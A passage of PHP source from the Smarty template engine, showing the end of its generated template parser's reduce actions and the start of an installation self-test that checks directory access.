                'removed in a future release. Use Smarty::registerClass to explicitly register ' .
                'a class for access.', E_USER_DEPRECATED);
            $this->_retvalue = $this->yystack[$this->yyidx + -2]->minor.'::'.$this->yystack[$this->yyidx + 0]->minor[0].$this->yystack[$this->yyidx + 0]->minor[1];
        } 
    } else {
        $this->compiler->trigger_template_error ('static class \''.$this->yystack[$this->yyidx + -2]->minor.'\' is undefined or not allowed by security setting');
    }
    }
// line 799 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r101(){
    $this->_retvalue = $this->yystack[$this->yyidx + 0]->minor;
        }
// line 810 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r102(){
   $this->_retvalue = $this->compiler->compileVariable('\''.substr($this->yystack[$this->yyidx + 0]->minor,1).'\'');
    }
// line 813 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r103(){
    if ($this->yystack[$this->yyidx + 0]->minor['var'] === '\'smarty\'') {
        $smarty_var = $this->compiler->compileTag('private_special_variable',array(),$this->yystack[$this->yyidx + 0]->minor['smarty_internal_index']);
        $this->_retvalue = $smarty_var;
    } else {
        // used for array reset,next,prev,end,current 
        $this->last_variable = $this->yystack[$this->yyidx + 0]->minor['var'];
        $this->last_index = $this->yystack[$this->yyidx + 0]->minor['smarty_internal_index'];
        $this->_retvalue = $this->compiler->compileVariable($this->yystack[$this->yyidx + 0]->minor['var']).$this->yystack[$this->yyidx + 0]->minor['smarty_internal_index'];
    }
    }
// line 826 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r104(){
    $this->_retvalue = '$_smarty_tpl->tpl_vars['. $this->yystack[$this->yyidx + -2]->minor .']->'.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 836 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r106(){
    $this->_retvalue = $this->compiler->compileConfigVariable('\'' . $this->yystack[$this->yyidx + -1]->minor . '\'');
    }
// line 840 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r107(){
    $this->_retvalue = '(is_array($tmp = ' . $this->compiler->compileConfigVariable('\'' . $this->yystack[$this->yyidx + -2]->minor . '\'') . ') ? $tmp'.$this->yystack[$this->yyidx + 0]->minor.' :null)';
    }
// line 844 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r108(){
    $this->_retvalue = $this->compiler->compileConfigVariable($this->yystack[$this->yyidx + -1]->minor);
    }
// line 848 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r109(){
    $this->_retvalue = '(is_array($tmp = ' . $this->compiler->compileConfigVariable($this->yystack[$this->yyidx + -2]->minor) . ') ? $tmp'.$this->yystack[$this->yyidx + 0]->minor.' : null)';
    }
// line 852 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r110(){
    $this->_retvalue = array('var'=>'\''.substr($this->yystack[$this->yyidx + -1]->minor,1).'\'', 'smarty_internal_index'=>$this->yystack[$this->yyidx + 0]->minor);
    }
// line 855 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r111(){
    $this->_retvalue = array('var'=>$this->yystack[$this->yyidx + -1]->minor, 'smarty_internal_index'=>$this->yystack[$this->yyidx + 0]->minor);
    }
// line 868 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r113(){
    return;
    }
// line 874 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r114(){
    $this->_retvalue = '['.$this->compiler->compileVariable('\''.substr($this->yystack[$this->yyidx + 0]->minor,1).'\'').']';
    }
// line 877 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r115(){
    $this->_retvalue = '['.$this->compiler->compileVariable($this->yystack[$this->yyidx + 0]->minor).']';
    }
// line 881 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r116(){
    $this->_retvalue = '['.$this->compiler->compileVariable($this->yystack[$this->yyidx + -2]->minor).'->'.$this->yystack[$this->yyidx + 0]->minor.']';
    }
// line 885 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r117(){
    $this->_retvalue = '[\''. $this->yystack[$this->yyidx + 0]->minor .'\']';
    }
// line 889 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r118(){
    $this->_retvalue = '['. $this->yystack[$this->yyidx + 0]->minor .']';
    }
// line 894 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r119(){
    $this->_retvalue = '['. $this->yystack[$this->yyidx + -1]->minor .']';
    }
// line 899 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r120(){
    $this->_retvalue = '['.$this->compiler->compileTag('private_special_variable',array(),'[\'section\'][\''.$this->yystack[$this->yyidx + -1]->minor.'\'][\'index\']').']';
    }
// line 903 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r121(){
    $this->_retvalue = '['.$this->compiler->compileTag('private_special_variable',array(),'[\'section\'][\''.$this->yystack[$this->yyidx + -3]->minor.'\'][\''.$this->yystack[$this->yyidx + -1]->minor.'\']').']';
    }
// line 906 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r122(){
    $this->_retvalue = '['.$this->yystack[$this->yyidx + -1]->minor.']';
    }
// line 912 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r124(){
    $this->_retvalue = '['.$this->compiler->compileVariable('\''.substr($this->yystack[$this->yyidx + -1]->minor,1).'\'').']';
    }
// line 928 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r128(){
    $this->_retvalue = '[]';
    }
// line 938 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r129(){
    $this->_retvalue = '\''.substr($this->yystack[$this->yyidx + 0]->minor,1).'\'';
    }
// line 942 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r130(){
    $this->_retvalue = '\'\'';
    }
// line 947 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r131(){
    $this->_retvalue = $this->yystack[$this->yyidx + -1]->minor.'.'.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 955 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r133(){
    $var = trim(substr($this->yystack[$this->yyidx + 0]->minor, $this->compiler->getLdelLength(), -$this->compiler->getRdelLength()), ' $');
    $this->_retvalue = $this->compiler->compileVariable('\''.$var.'\'');
    }
// line 961 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r134(){
    $this->_retvalue = '('.$this->yystack[$this->yyidx + -1]->minor.')';
    }
// line 968 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r135(){
    if ($this->yystack[$this->yyidx + -1]->minor['var'] === '\'smarty\'') {
        $this->_retvalue =  $this->compiler->compileTag('private_special_variable',array(),$this->yystack[$this->yyidx + -1]->minor['smarty_internal_index']).$this->yystack[$this->yyidx + 0]->minor;
    } else {
        $this->_retvalue = $this->compiler->compileVariable($this->yystack[$this->yyidx + -1]->minor['var']).$this->yystack[$this->yyidx + -1]->minor['smarty_internal_index'].$this->yystack[$this->yyidx + 0]->minor;
    }
    }
// line 977 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r136(){
    $this->_retvalue  = $this->yystack[$this->yyidx + 0]->minor;
    }
// line 982 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r137(){
    $this->_retvalue  = $this->yystack[$this->yyidx + -1]->minor.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 987 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r138(){
    if ($this->security && substr($this->yystack[$this->yyidx + -1]->minor,0,1) === '_') {
        $this->compiler->trigger_template_error (self::ERR1);
    }
    $this->_retvalue = '->'.$this->yystack[$this->yyidx + -1]->minor.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 994 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r139(){
    if ($this->security) {
        $this->compiler->trigger_template_error (self::ERR2);
    }
    $this->_retvalue = '->{'.$this->compiler->compileVariable($this->yystack[$this->yyidx + -1]->minor).$this->yystack[$this->yyidx + 0]->minor.'}';
    }
// line 1001 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r140(){
    if ($this->security) {
        $this->compiler->trigger_template_error (self::ERR2);
    }
    $this->_retvalue = '->{'.$this->yystack[$this->yyidx + -2]->minor.$this->yystack[$this->yyidx + 0]->minor.'}';
    }
// line 1008 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r141(){
    if ($this->security) {
        $this->compiler->trigger_template_error (self::ERR2);
    }
    $this->_retvalue = '->{\''.$this->yystack[$this->yyidx + -4]->minor.'\'.'.$this->yystack[$this->yyidx + -2]->minor.$this->yystack[$this->yyidx + 0]->minor.'}';
    }
// line 1016 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r142(){
    $this->_retvalue = '->'.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 1024 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r143(){
    $this->_retvalue = $this->compiler->compilePHPFunctionCall($this->yystack[$this->yyidx + -3]->minor, $this->yystack[$this->yyidx + -1]->minor);
    }
// line 1032 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r144(){
    if ($this->security && substr($this->yystack[$this->yyidx + -3]->minor,0,1) === '_') {
        $this->compiler->trigger_template_error (self::ERR1);
    }
    $this->_retvalue = $this->yystack[$this->yyidx + -3]->minor . '('. implode(',',$this->yystack[$this->yyidx + -1]->minor) .')';
    }
// line 1039 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r145(){
    if ($this->security) {
        $this->compiler->trigger_template_error (self::ERR2);
    }
    $prefixVar = $this->compiler->getNewPrefixVariable();
    $this->compiler->appendPrefixCode("<?php {$prefixVar} = ".$this->compiler->compileVariable('\''.substr($this->yystack[$this->yyidx + -3]->minor,1).'\'').';?>');
    $this->_retvalue = $prefixVar .'('. implode(',',$this->yystack[$this->yyidx + -1]->minor) .')';
    }
// line 1050 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r146(){
    $this->_retvalue = array_merge($this->yystack[$this->yyidx + -2]->minor,array($this->yystack[$this->yyidx + 0]->minor));
    }
// line 1067 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r149(){
    $this->_retvalue = array_merge($this->yystack[$this->yyidx + -2]->minor,array(array_merge($this->yystack[$this->yyidx + -1]->minor,$this->yystack[$this->yyidx + 0]->minor)));
    }
// line 1071 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r150(){
    $this->_retvalue = array(array_merge($this->yystack[$this->yyidx + -1]->minor,$this->yystack[$this->yyidx + 0]->minor));
    }
// line 1079 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r152(){
    $this->_retvalue =  array($this->yystack[$this->yyidx + 0]->minor);
    }
// line 1087 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r153(){
    $this->_retvalue = array_merge($this->yystack[$this->yyidx + -1]->minor,$this->yystack[$this->yyidx + 0]->minor);
    }
// line 1100 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r156(){
    $this->_retvalue = array(trim($this->yystack[$this->yyidx + -1]->minor).$this->yystack[$this->yyidx + 0]->minor);
    }
// line 1109 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r158(){
    $this->_retvalue = array($this->yystack[$this->yyidx + 0]->minor, '', 'method');
    }
// line 1114 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r159(){
    $this->_retvalue = array($this->yystack[$this->yyidx + -1]->minor, $this->yystack[$this->yyidx + 0]->minor, 'method');
    }
// line 1119 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r160(){
    $this->_retvalue = array($this->yystack[$this->yyidx + 0]->minor, '');
    }
// line 1124 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r161(){
    $this->_retvalue = array($this->yystack[$this->yyidx + -1]->minor, $this->yystack[$this->yyidx + 0]->minor, 'property');
    }
// line 1129 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r162(){
    $this->_retvalue = array($this->yystack[$this->yyidx + -2]->minor, $this->yystack[$this->yyidx + -1]->minor.$this->yystack[$this->yyidx + 0]->minor, 'property');
    }
// line 1135 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r163(){
    $this->_retvalue = ' '. trim($this->yystack[$this->yyidx + 0]->minor) . ' ';
    }
// line 1139 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r164(){
    static $lops = array(
        'eq' => ' == ',
        'ne' => ' != ',
        'neq' => ' != ',
        'gt' => ' > ',
        'ge' => ' >= ',
        'gte' => ' >= ',
        'lt' =>  ' < ',
        'le' =>  ' <= ',
        'lte' => ' <= ',
        'mod' =>  ' % ',
        'and' => ' && ',
        'or' => ' || ',
        'xor' => ' xor ',
         );
    $op = strtolower(preg_replace('/\s*/', '', $this->yystack[$this->yyidx + 0]->minor));
    $this->_retvalue = $lops[$op];
    }
// line 1158 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r165(){
     static $tlops = array(
         'isdivby' => array('op' => ' % ', 'pre' => '!('),
         'isnotdivby' => array('op' => ' % ', 'pre' => '('),
         'isevenby' => array('op' => ' / ', 'pre' => '!(1 & '),
         'isnotevenby' => array('op' => ' / ', 'pre' => '(1 & '),
         'isoddby' => array('op' => ' / ', 'pre' => '(1 & '),
         'isnotoddby' => array('op' => ' / ', 'pre' => '!(1 & '),
         );
     $op = strtolower(preg_replace('/\s*/', '', $this->yystack[$this->yyidx + 0]->minor));
     $this->_retvalue = $tlops[$op];
     }
// line 1171 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r166(){
        static $scond = array (
            'iseven' => '!(1 & ',
            'isnoteven' => '(1 & ',
            'isodd' => '(1 & ',
            'isnotodd' => '!(1 & ',
        );
   $op = strtolower(str_replace(' ', '', $this->yystack[$this->yyidx + 0]->minor));
   $this->_retvalue = $scond[$op];
    }
// line 1185 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r167(){
    $this->_retvalue = 'array('.$this->yystack[$this->yyidx + -1]->minor.')';
    }
// line 1196 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r170(){
    $this->_retvalue = $this->yystack[$this->yyidx + -2]->minor.','.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 1204 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r172(){
    $this->_retvalue = $this->yystack[$this->yyidx + -2]->minor.'=>'.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 1208 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r173(){ 
    $this->_retvalue = '\''.$this->yystack[$this->yyidx + -2]->minor.'\'=>'.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 1224 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r176(){
    $this->compiler->leaveDoubleQuote();
    $this->_retvalue = $this->yystack[$this->yyidx + -1]->minor->to_smarty_php($this);
    }
// line 1230 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r177(){
    $this->yystack[$this->yyidx + -1]->minor->append_subtree($this, $this->yystack[$this->yyidx + 0]->minor);
    $this->_retvalue = $this->yystack[$this->yyidx + -1]->minor;
    }
// line 1235 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r178(){
    $this->_retvalue = new Smarty_Internal_ParseTree_Dq($this, $this->yystack[$this->yyidx + 0]->minor);
    }
// line 1239 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r179(){
    $this->_retvalue = new Smarty_Internal_ParseTree_Code('(string)'.$this->yystack[$this->yyidx + -1]->minor);
    }
// line 1243 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r180(){
    $this->_retvalue = new Smarty_Internal_ParseTree_Code('(string)('.$this->yystack[$this->yyidx + -1]->minor.')');
    }
// line 1247 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r181(){
    $this->_retvalue = new Smarty_Internal_ParseTree_Code('(string)$_smarty_tpl->tpl_vars[\''. substr($this->yystack[$this->yyidx + 0]->minor,1) .'\']->value');
    }
// line 1259 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r184(){
    $this->_retvalue = new Smarty_Internal_ParseTree_Tag($this, $this->yystack[$this->yyidx + 0]->minor);
    }
// line 1263 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r185(){
    $this->_retvalue = new Smarty_Internal_ParseTree_DqContent($this->yystack[$this->yyidx + 0]->minor);
    }

    private $_retvalue;

    public function yy_reduce($yyruleno)
    {
        if ($this->yyTraceFILE && $yyruleno >= 0
              && $yyruleno < count(self::$yyRuleName)) {
            fprintf($this->yyTraceFILE, "%sReduce (%d) [%s].\n",
                $this->yyTracePrompt, $yyruleno,
                self::$yyRuleName[$yyruleno]);
        }

        $this->_retvalue = $yy_lefthand_side = null;
        if (isset(self::$yyReduceMap[$yyruleno])) {
            // call the action
            $this->_retvalue = null;
            $this->{'yy_r' . self::$yyReduceMap[$yyruleno]}();
            $yy_lefthand_side = $this->_retvalue;
        }
        $yygoto = self::$yyRuleInfo[$yyruleno][0];
        $yysize = self::$yyRuleInfo[$yyruleno][1];
        $this->yyidx -= $yysize;
        for ($i = $yysize; $i; $i--) {
            // pop all of the right-hand side parameters
            array_pop($this->yystack);
        }
        $yyact = $this->yy_find_reduce_action($this->yystack[$this->yyidx]->stateno, $yygoto);
        if ($yyact < self::YYNSTATE) {
            if (!$this->yyTraceFILE && $yysize) {
                $this->yyidx++;
                $x = new TP_yyStackEntry;
                $x->stateno = $yyact;
                $x->major = $yygoto;
                $x->minor = $yy_lefthand_side;
                $this->yystack[$this->yyidx] = $x;
            } else {
                $this->yy_shift($yyact, $yygoto, $yy_lefthand_side);
            }
        } elseif ($yyact === self::YYNSTATE + self::YYNRULE + 1) {
            $this->yy_accept();
        }
    }

    public function yy_parse_failed()
    {
        if ($this->yyTraceFILE) {
            fprintf($this->yyTraceFILE, "%sFail!\n", $this->yyTracePrompt);
        } while ($this->yyidx >= 0) {
            $this->yy_pop_parser_stack();
        }
    }

    public function yy_syntax_error($yymajor, $TOKEN)
    {
// line 213 "../smarty/lexer/smarty_internal_templateparser.y"

    $this->internalError = true;
    $this->yymajor = $yymajor;
    $this->compiler->trigger_template_error();
    }

    public function yy_accept()
    {
        if ($this->yyTraceFILE) {
            fprintf($this->yyTraceFILE, "%sAccept!\n", $this->yyTracePrompt);
        } while ($this->yyidx >= 0) {
            $this->yy_pop_parser_stack();
        }
// line 206 "../smarty/lexer/smarty_internal_templateparser.y"

    $this->successful = !$this->internalError;
    $this->internalError = false;
    $this->retvalue = $this->_retvalue;
    }

    public function doParse($yymajor, $yytokenvalue)
    {
        $yyerrorhit = 0;   /* True if yymajor has invoked an error */

        if ($this->yyidx === null || $this->yyidx < 0) {
            $this->yyidx = 0;
            $this->yyerrcnt = -1;
            $x = new TP_yyStackEntry;
            $x->stateno = 0;
            $x->major = 0;
            $this->yystack = array();
            $this->yystack[] = $x;
        }
        $yyendofinput = ($yymajor==0);

        if ($this->yyTraceFILE) {
            fprintf($this->yyTraceFILE, "%sInput %s\n",
                $this->yyTracePrompt, $this->yyTokenName[$yymajor]);
        }

        do {
            $yyact = $this->yy_find_shift_action($yymajor);
            if ($yymajor < self::YYERRORSYMBOL &&
                  !$this->yy_is_expected_token($yymajor)) {
                // force a syntax error
                $yyact = self::YY_ERROR_ACTION;
            }
            if ($yyact < self::YYNSTATE) {
                $this->yy_shift($yyact, $yymajor, $yytokenvalue);
                $this->yyerrcnt--;
                if ($yyendofinput && $this->yyidx >= 0) {
                    $yymajor = 0;
                } else {
                    $yymajor = self::YYNOCODE;
                }
            } elseif ($yyact < self::YYNSTATE + self::YYNRULE) {
                $this->yy_reduce($yyact - self::YYNSTATE);
            } elseif ($yyact === self::YY_ERROR_ACTION) {
                if ($this->yyTraceFILE) {
                    fprintf($this->yyTraceFILE, "%sSyntax Error!\n",
                        $this->yyTracePrompt);
                }
                if (self::YYERRORSYMBOL) {
                    if ($this->yyerrcnt < 0) {
                        $this->yy_syntax_error($yymajor, $yytokenvalue);
                    }
                    $yymx = $this->yystack[$this->yyidx]->major;
                    if ($yymx === self::YYERRORSYMBOL || $yyerrorhit) {
                        if ($this->yyTraceFILE) {
                            fprintf($this->yyTraceFILE, "%sDiscard input token %s\n",
                                $this->yyTracePrompt, $this->yyTokenName[$yymajor]);
                        }
                        $this->yy_destructor($yymajor, $yytokenvalue);
                        $yymajor = self::YYNOCODE;
                    } else {
                        while ($this->yyidx >= 0 &&
                                 $yymx !== self::YYERRORSYMBOL &&
        ($yyact = $this->yy_find_shift_action(self::YYERRORSYMBOL)) >= self::YYNSTATE
                              ){
                            $this->yy_pop_parser_stack();
                        }
                        if ($this->yyidx < 0 || $yymajor==0) {
                            $this->yy_destructor($yymajor, $yytokenvalue);
                            $this->yy_parse_failed();
                            $yymajor = self::YYNOCODE;
                        } elseif ($yymx !== self::YYERRORSYMBOL) {
                            $u2 = 0;
                            $this->yy_shift($yyact, self::YYERRORSYMBOL, $u2);
                        }
                    }
                    $this->yyerrcnt = 3;
                    $yyerrorhit = 1;
                } else {
                    if ($this->yyerrcnt <= 0) {
                        $this->yy_syntax_error($yymajor, $yytokenvalue);
                    }
                    $this->yyerrcnt = 3;
                    $this->yy_destructor($yymajor, $yytokenvalue);
                    if ($yyendofinput) {
                        $this->yy_parse_failed();
                    }
                    $yymajor = self::YYNOCODE;
                }
            } else {
                $this->yy_accept();
                $yymajor = self::YYNOCODE;
            }
        } while ($yymajor !== self::YYNOCODE && $this->yyidx >= 0);
    }
}

<?php
/**
 * Smarty Internal TestInstall
 * Test Smarty installation
 *
 * @package    Smarty
 * @subpackage Utilities
 * @author     Uwe Tews
 */

/**
 * TestInstall class
 *
 * @package    Smarty
 * @subpackage Utilities
 */
class Smarty_Internal_TestInstall
{
    /**
     * diagnose Smarty setup
     * If $errors is secified, the diagnostic report will be appended to the array, rather than being output.
     *
     * @param \Smarty $smarty
     * @param array   $errors array to push results into rather than outputting them
     *
     * @return bool status, true if everything is fine, false else
     */
    public static function testInstall(Smarty $smarty, &$errors = null)
    {
        $status = true;
        if ($errors === null) {
            echo "<PRE>\n";
            echo "Smarty Installation test...\n";
            echo "Testing template directory...\n";
        }
        $_stream_resolve_include_path = function_exists('stream_resolve_include_path');
        // test if all registered template_dir are accessible
        foreach ($smarty->getTemplateDir() as $template_dir) {
            $_template_dir = $template_dir;
            $template_dir = realpath($template_dir);
            // resolve include_path or fail existence
            if (!$template_dir) {
                if ($smarty->use_include_path && !preg_match('/^([\/\\\\]|[a-zA-Z]:[\/\\\\])/', $_template_dir)) {
                    // try PHP include_path
                    if ($_stream_resolve_include_path) {
                        $template_dir = stream_resolve_include_path($_template_dir);
                    } else {
                        $template_dir = $smarty->ext->_getIncludePath->getIncludePath($_template_dir, null, $smarty);
                    }
                    if ($template_dir !== false) {
                        if ($errors === null) {
                            echo "$template_dir is OK.\n";
                        }
                        continue;
                    } else {
                        $status = false;
                        $message =
                            "FAILED: $_template_dir does not exist (and couldn't be found in include_path either)";
                        if ($errors === null) {
                            echo $message . ".\n";
                        } else {
                            $errors[ 'template_dir' ] = $message;
                        }
                        continue;
                    }
                } else {
                    $status = false;
                    $message = "FAILED: $_template_dir does not exist";
                    if ($errors === null) {
                        echo $message . ".\n";
                    } else {
                        $errors[ 'template_dir' ] = $message;
                    }
                    continue;
                }
            }
            if (!is_dir($template_dir)) {
                $status = false;
                $message = "FAILED: $template_dir is not a directory";
                if ($errors === null) {
                    echo $message . ".\n";
                } else {
                    $errors[ 'template_dir' ] = $message;
                }
            } elseif (!is_readable($template_dir)) {
                $status = false;
                $message = "FAILED: $template_dir is not readable";
                if ($errors === null) {
                    echo $message . ".\n";
                } else {
                    $errors[ 'template_dir' ] = $message;
                }
            } else {
                if ($errors === null) {
                    echo "$template_dir is OK.\n";
                }
            }
        }
        if ($errors === null) {
            echo "Testing compile directory...\n";
        }
        // test if registered compile_dir is accessible
        $__compile_dir = $smarty->getCompileDir();
        $_compile_dir = realpath($__compile_dir);
        if (!$_compile_dir) {
            $status = false;
            $message = "FAILED: {$__compile_dir} does not exist";
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'compile_dir' ] = $message;
            }
        } elseif (!is_dir($_compile_dir)) {
            $status = false;
            $message = "FAILED: {$_compile_dir} is not a directory";
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'compile_dir' ] = $message;
            }
        } elseif (!is_readable($_compile_dir)) {
            $status = false;
            $message = "FAILED: {$_compile_dir} is not readable";
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'compile_dir' ] = $message;
            }
        } elseif (!is_writable($_compile_dir)) {
            $status = false;
            $message = "FAILED: {$_compile_dir} is not writable";
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'compile_dir' ] = $message;
            }
        } else {
            if ($errors === null) {
                echo "{$_compile_dir} is OK.\n";
            }
        }
        if ($errors === null) {
            echo "Testing plugins directory...\n";
        }
        // test if all registered plugins_dir are accessible
        // and if core plugins directory is still registered
        $_core_plugins_dir = realpath(__DIR__ . '/../plugins');
        $_core_plugins_available = false;
        foreach ($smarty->getPluginsDir() as $plugin_dir) {
            $_plugin_dir = $plugin_dir;
            $plugin_dir = realpath($plugin_dir);
            // resolve include_path or fail existence
            if (!$plugin_dir) {
                if ($smarty->use_include_path && !preg_match('/^([\/\\\\]|[a-zA-Z]:[\/\\\\])/', $_plugin_dir)) {
                    // try PHP include_path
                    if ($_stream_resolve_include_path) {
                        $plugin_dir = stream_resolve_include_path($_plugin_dir);
                    } else {
                        $plugin_dir = $smarty->ext->_getIncludePath->getIncludePath($_plugin_dir, null, $smarty);
                    }
                    if ($plugin_dir !== false) {
                        if ($errors === null) {
                            echo "$plugin_dir is OK.\n";
                        }
                        continue;
                    } else {
                        $status = false;
                        $message = "FAILED: $_plugin_dir does not exist (and couldn't be found in include_path either)";
                        if ($errors === null) {
                            echo $message . ".\n";
                        } else {
                            $errors[ 'plugins_dir' ] = $message;
                        }
                        continue;
                    }
                } else {
                    $status = false;
                    $message = "FAILED: $_plugin_dir does not exist";
                    if ($errors === null) {
                        echo $message . ".\n";
                    } else {
                        $errors[ 'plugins_dir' ] = $message;
                    }
                    continue;
                }
            }
            if (!is_dir($plugin_dir)) {
                $status = false;
                $message = "FAILED: $plugin_dir is not a directory";
                if ($errors === null) {
                    echo $message . ".\n";
                } else {
                    $errors[ 'plugins_dir' ] = $message;
                }
            } elseif (!is_readable($plugin_dir)) {
                $status = false;
                $message = "FAILED: $plugin_dir is not readable";
                if ($errors === null) {
                    echo $message . ".\n";
                } else {
                    $errors[ 'plugins_dir' ] = $message;
                }
            } elseif ($_core_plugins_dir && $_core_plugins_dir == realpath($plugin_dir)) {
                $_core_plugins_available = true;
                if ($errors === null) {
                    echo "$plugin_dir is OK.\n";
                }
            } else {
                if ($errors === null) {
                    echo "$plugin_dir is OK.\n";
                }
            }
        }
        if (!$_core_plugins_available) {
            $status = false;
            $message = "WARNING: Smarty's own libs/plugins is not available";
            if ($errors === null) {
                echo $message . ".\n";
            } elseif (!isset($errors[ 'plugins_dir' ])) {
                $errors[ 'plugins_dir' ] = $message;
            }
        }
        if ($errors === null) {
            echo "Testing cache directory...\n";
        }
        // test if all registered cache_dir is accessible
        $__cache_dir = $smarty->getCacheDir();
        $_cache_dir = realpath($__cache_dir);
        if (!$_cache_dir) {
            $status = false;
            $message = "FAILED: {$__cache_dir} does not exist";
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'cache_dir' ] = $message;
            }
        } elseif (!is_dir($_cache_dir)) {
            $status = false;
            $message = "FAILED: {$_cache_dir} is not a directory";
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'cache_dir' ] = $message;
            }
        } elseif (!is_readable($_cache_dir)) {
            $status = false;
            $message = "FAILED: {$_cache_dir} is not readable";
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'cache_dir' ] = $message;
            }
        } elseif (!is_writable($_cache_dir)) {
            $status = false;
            $message = "FAILED: {$_cache_dir} is not writable";
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'cache_dir' ] = $message;
            }
        } else {
            if ($errors === null) {
                echo "{$_cache_dir} is OK.\n";
            }
        }
        if ($errors === null) {
            echo "Testing configs directory...\n";
        }
        // test if all registered config_dir are accessible
        foreach ($smarty->getConfigDir() as $config_dir) {
            $_config_dir = $config_dir;
            // resolve include_path or fail existence
            if (!$config_dir) {
                if ($smarty->use_include_path && !preg_match('/^([\/\\\\]|[a-zA-Z]:[\/\\\\])/', $_config_dir)) {
                    // try PHP include_path
                    if ($_stream_resolve_include_path) {
                        $config_dir = stream_resolve_include_path($_config_dir);
                    } else {
                        $config_dir = $smarty->ext->_getIncludePath->getIncludePath($_config_dir, null, $smarty);
                    }
                    if ($config_dir !== false) {
                        if ($errors === null) {
                            echo "$config_dir is OK.\n";
                        }
                        continue;
                    } else {
                        $status = false;
                        $message = "FAILED: $_config_dir does not exist (and couldn't be found in include_path either)";
                        if ($errors === null) {
                            echo $message . ".\n";
                        } else {
                            $errors[ 'config_dir' ] = $message;
                        }
                        continue;
                    }
                } else {
                    $status = false;
                    $message = "FAILED: $_config_dir does not exist";
                    if ($errors === null) {
                        echo $message . ".\n";
                    } else {
                        $errors[ 'config_dir' ] = $message;
                    }
                    continue;
                }
            }
            if (!is_dir($config_dir)) {
                $status = false;
                $message = "FAILED: $config_dir is not a directory";
                if ($errors === null) {
                    echo $message . ".\n";
                } else {
                    $errors[ 'config_dir' ] = $message;
                }
            } elseif (!is_readable($config_dir)) {
                $status = false;
                $message = "FAILED: $config_dir is not readable";
                if ($errors === null) {
                    echo $message . ".\n";
                } else {
                    $errors[ 'config_dir' ] = $message;
                }
            } else {
